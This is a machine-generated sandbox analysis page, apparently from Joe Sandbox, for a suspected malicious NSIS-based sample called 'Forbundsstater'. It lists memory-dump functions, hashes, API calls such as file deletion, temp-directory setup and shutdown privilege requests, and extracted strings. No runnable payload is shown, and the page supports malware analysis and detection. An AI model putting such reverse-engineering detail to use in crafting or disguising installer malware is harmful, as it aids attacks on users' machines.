Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5c2f32bb4145d9264e876e6d0a055c67d8bb572b9aae1edbcbe01dfcacadb3
Instruction ID: 9f81f64d5fde6186e7da7a8e316376e6a554ee2d7ed1a236de74795bb5c5f742
Opcode Fuzzy Hash: 9a5c2f32bb4145d9264e876e6d0a055c67d8bb572b9aae1edbcbe01dfcacadb3
Instruction Fuzzy Hash: 20118E31300A12DFC7199B29C8A892EB7A7AFC47627154268EC1ACF764DF20DC468BD0

Function 00151F61 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a324eec5da78227f02ebf9cb6c93b38c350f9024f4d083b7a4386a1f391c0e
Instruction ID: ca82edaba08838caad9de3dc5449557923921322f5717c218d900f98d46d01bd
Opcode Fuzzy Hash: 01a324eec5da78227f02ebf9cb6c93b38c350f9024f4d083b7a4386a1f391c0e
Instruction Fuzzy Hash: D921BFB4C052098FCB41EFB8D9445EDBFF0BF4A301F10516AD809B7260EB345A9ACBA1

Function 0009D3FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657225499.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0bd9f5bfae9414b553adf7a75f2bf90c6538d2c9dae151f9cecf9b33809b08
Instruction ID: fc5bcc7066a85d807fb6416a1caf1c660dbeff3d17613ff0053b8747e03588a6
Opcode Fuzzy Hash: 4b0bd9f5bfae9414b553adf7a75f2bf90c6538d2c9dae151f9cecf9b33809b08
Instruction Fuzzy Hash: 8E110376544280DFCF12CF10D5C4B16BFB1FB94324F24C1AAD8490B616C33AE85ADBA2

Function 00155607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a6041ee0a4aa5e3268aa599295190a77f7667772878d7b8ecb8d3fd069ade1d
Instruction ID: 7b63de89e7123d545498c07d5ca42bf68d88e08078dab09d69e48a6256b6f1c1
Opcode Fuzzy Hash: 5a6041ee0a4aa5e3268aa599295190a77f7667772878d7b8ecb8d3fd069ade1d
Instruction Fuzzy Hash: BD014572604105AFCB028E64D8206FE3BB7DFC8352B58802AF918CB290DB718C029BA1

Function 00151F08 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1028fe3434a736e66b295c5635d57cb40bb5ebb9b1facdbe1b8a9c18ffd2723a
Instruction ID: f8697cf6ae857abb96724c62a9900e756a9464817beee21cd94d6fea2c66dc01
Opcode Fuzzy Hash: 1028fe3434a736e66b295c5635d57cb40bb5ebb9b1facdbe1b8a9c18ffd2723a
Instruction Fuzzy Hash: 3311F3B4D0460A8FCB01DFA8D8485EEBFF0FF49311F14416AD819B7264EB301A89CBA1

Function 00152010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130c1e86b267babbcee3f0fdd7f4c5bc1d87af0b7434f51bfbb6ab442ab4ac9b
Instruction ID: 78bf7d43fd34306cf24929ca6fb8ac48c026444e4957df3df7106b4292c06e2e
Opcode Fuzzy Hash: 130c1e86b267babbcee3f0fdd7f4c5bc1d87af0b7434f51bfbb6ab442ab4ac9b
Instruction Fuzzy Hash: 51E09236C143564FCB0297B498104DEBF70EED3210B4642ABC025BB061E7B01A4ECB71

Function 00152020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040c55b20a73f5780f08b9c8f642321de3065e05b7dfbac2cb98c7d4fd1faf31
Instruction ID: 029bc0a622d6c8ecf8e7d7f29d452ea5785f4d4c389dded27e885aa293771617
Opcode Fuzzy Hash: 040c55b20a73f5780f08b9c8f642321de3065e05b7dfbac2cb98c7d4fd1faf31
Instruction Fuzzy Hash: AFD05E32D2032B97CB00EBA5EC048EFFB38EED6261B958626D52437154FB702659C6E1

Function 00158258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 7960d51d526fba272fafbbdd8c30103bf7f2efd89ecdb8d8f0d1063ed23c0432
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 0BC0123310C1246A9624204F7C409A36B4CD2C17B5D250137F92CE720059429C4441B4

Function 0015A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 125d3c8f6968f41c48b67fdf69131746c79c48ffda54b3a05ad70e78ebb24c9a
Instruction ID: 6ba85b5adf8dfa62ddf05b5b60813d2c0fba69fe2043bdb99293f5ebb0cf06ab
Opcode Fuzzy Hash: 125d3c8f6968f41c48b67fdf69131746c79c48ffda54b3a05ad70e78ebb24c9a
Instruction Fuzzy Hash: 4AD0677AB510189FCB049F98EC408DDB7B6FB9C221B448116E915A3261C63199A1DB50

Function 00155EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657391409.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184c68376b94a0ff1ae8144fa63e77a204e838e612c6d1b8561b75807ad0f942
Instruction ID: 02dbc77b7be7746fa8a2c5457c2f0d054f7115cf1d33392997c6c44be34c46bf
Opcode Fuzzy Hash: 184c68376b94a0ff1ae8144fa63e77a204e838e612c6d1b8561b75807ad0f942
Instruction Fuzzy Hash: E3C0127015470947C506EB75D9459A9772EEFC0300FC08D51F40A0E56BEE7829C44691

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

, xrefs: 004050C7
N, xrefs: 00404D99
M, xrefs: 00404CB8

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 00403358 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 335stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNEL32(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
lstrcatW.KERNEL32(00436800,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
DeleteFileW.KERNEL32(00436000), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(00436800,~nsu.tmp), ref: 0040364B
lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

Error launching installer, xrefs: 004035D6
SeShutdownPrivilege, xrefs: 0040376D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
~nsu.tmp, xrefs: 00403645
NSIS Error, xrefs: 004033B7
TMP, xrefs: 00403556
\Temp, xrefs: 00403520
Low, xrefs: 0040353C
TEMP, xrefs: 0040354E

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1875889550
Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 00405770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00436800,75922EE0,00434000), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
lstrcatW.KERNEL32(?,00409014), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,75922EE0,00434000), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,75922EE0,00405790,?,00436800,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 004062BE Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 004062DE
GetProcAddress.KERNEL32(?,?), ref: 004062F2

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID:
API String ID: 2508298434-0
Opcode ID: 42cad8e224df5ffb84edd273f9029a997feaa7a3d86f515bdac829ab4ee186d9
Instruction ID: f363e577c77ace96107da201db0129c74d43d21b85c6a833470fce6136359a47
Opcode Fuzzy Hash: 42cad8e224df5ffb84edd273f9029a997feaa7a3d86f515bdac829ab4ee186d9
Instruction Fuzzy Hash: 4CE08671608108BEEB126B70CC09FF7376CEB18310F0002797956E41D0EAB4ED949A65

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNEL32(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
EnableWindow.USER32(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000006.00000002.2657531977.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2657515414.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657548080.0000000000407000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657563681.0000000000409000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2657585320.0000000000448000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_Forbundsstater.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(00436000,004226D0), ref: 00403933
lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
